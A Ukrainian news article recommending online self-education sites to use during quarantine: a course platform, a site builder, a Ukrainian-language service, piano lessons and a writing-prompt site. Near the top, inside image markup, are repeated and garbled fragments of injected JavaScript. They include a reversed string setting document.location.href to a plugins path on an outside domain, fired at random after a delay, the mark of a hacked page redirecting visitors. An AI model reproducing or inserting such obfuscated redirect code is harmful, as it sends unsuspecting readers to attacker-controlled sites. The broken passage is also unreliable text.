НовиниКарантин – слушний час задля самоосвіти

Карантин – слушний час задля самоосвіти

-

Карантин – слушний час задля самоосвіти

Олександра Ган

Лінь, нудьга, м’яка подушка, їжа та абсолютна відсутність мотивації… Саме таким був карантин для багатьох українців. За понад три місяці карантинного режиму ми встигли добряче відпочити, а тепер пора й про саморозвиток поговорити. У вільний час не обов’язково з головою поринати в серіали, можна  провести його з користю для себе.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dollarphotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toclub_53653319-e1398084275217-700×466-1-300×200.jpg” alt=”” width=”300″ height=”200″ />

А так як карантин в Україні продовжено до кінця липня, ми пропонуємо до вашої уваги кілька потужних ресурсів, що допоможуть дізнатися безліч корисних речей та прокачати свої навички. Витративши всього 15 хвилин в день для ознайомлення із запропонованими сайтами, ви зможете дізнатися багато нового та корисного.

Навчаємось та спілкуємось

Prometheus (prometheus.org.ua) – волонтерський проект масових безкоштовних онлайн-курсів. Користувачі сервісу можуть обрати тему, що їх цікавить, та розпочати її вивчення. Кожен курс складається зі заздалегідь записаних лекцій, які доступні до перегляду цілодобово. Далі ви матиме змогу перейти до інтерактивних завдань, що допоможуть перевірити, як ви засвоїли зміст відеоуроків. Передбачена й можливість спілкування з іншими студентами та викладачами на спеціальному форумі. А приємним бонусом до навчання може стати отримання сертифікату про його проходження, за умови успішного виконання всіх завдань.

Створюємо власний веб-сайт

Wix (wix.com) – платформа для створення веб-сайтів, яка стане в нагоді для розробки власного портфоліо, блогу, інтернет-магазину чи промо-сторінки. Оптимальний варіант для тих, у кого немає часу вникати в деталі програмування. Завдяки доволі простим інструментам можна з легкістю створити сайт пристойної якості. Вам пропонують спеціалізовані шаблони, що логічно поділені на категорії. Все, що від вас вимагається – обрати один із запропонованих варіантів та наповнити його потрібною інформацією. Всі шаблони можна налаштовувати за власним смаком, змінюючи кольорову гаму, шрифти, додаючи свої фотографії та інші елементи.

Українська з Лепетуном

 «Мова – ДНК нації» (ukr-mova.in.ua) – освітній сервіс для тих, хто бажає вивчити або вдосконалити свої знання української мови. Тут ви знайдете чимало цікавих вправ, диктантів, блогів та цілу бібліотеку правил. Для того, щоб навчання було приємнішим, а запам’ятовування винятків простішим, автори проекту подають інформацію у вигляді веселих зображень Лепетуна зі смаколиками. Оригінальні картинки допоможуть оволодіти граматикою, орфографією, навчать правильно вимовляти українські слова, а також доречно вживати фразеологізми. Крім того, на сайті є функція перевірки текстів на грамотність, яка може стати у нагоді в повсякденні.

Опановуємо фортепіано

Pianu (pianu.com) – онлайн-платформа для навчання грі на фортепіано. Інструмент замінить клавіатура, а викладача – чіткі інструкції, прописані на сайті, тому акорди до улюблених пісень ви вивчите без складнощів, адже на цій платформі пропонується безліч мелодій різноманітних жанрів для опанування.

Навчальний процес підлаштовується під ваш рівень знань – якщо ви новачок, вам запропонують освоїти нотну грамоту, а вже потім перейти до практики. А якщо ви вже «прокачаний» музикант, то можете поекспериментувати, створивши власну мелодію.

Письменництво завжди в тренді

«Пишіть щодня!» – закликає Daily Page (www.dailypage.co), сервіс, який допомагає тренуватися в написанні статей. Зараз, в часи масового захоплення блогами, ця навичка дуже актуальна, адже добре написаний текст може жити вічно. Майбутнім журналістам та блогерам, що зареєструвалися на сайті, щоранку на електрону адресу приходить лист з темою наступного завдання.

Теми трапляються різні: «Мріяти означає», «Вiсiм причин, чому варто читати книжки», «Еволюція дитинства, яким воно було 100 років тому». Але треба бути готовим й до того, що деякі із запропонованих тем можуть виявитись кумедними і навіть дещо абсурдними. Наприклад: «Що приховує Кім Кардашян від своєї матері?» або «Що сказало би яйце, будучи живою істотою?» За бажанням можете поділитися своєю творчістю з іншими користувачами сайту або писати виключно для себе.

Саморозвиток – це завжди важкий та кропіткий труд. Однак праця над собою завжди дає позитивний результат, навіть в самих неочікуваних ситуаціях та містах. Тому налаштовуємо себе на позитив та нумо самовдосконалюватися! Бажаємо всім успіху.

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам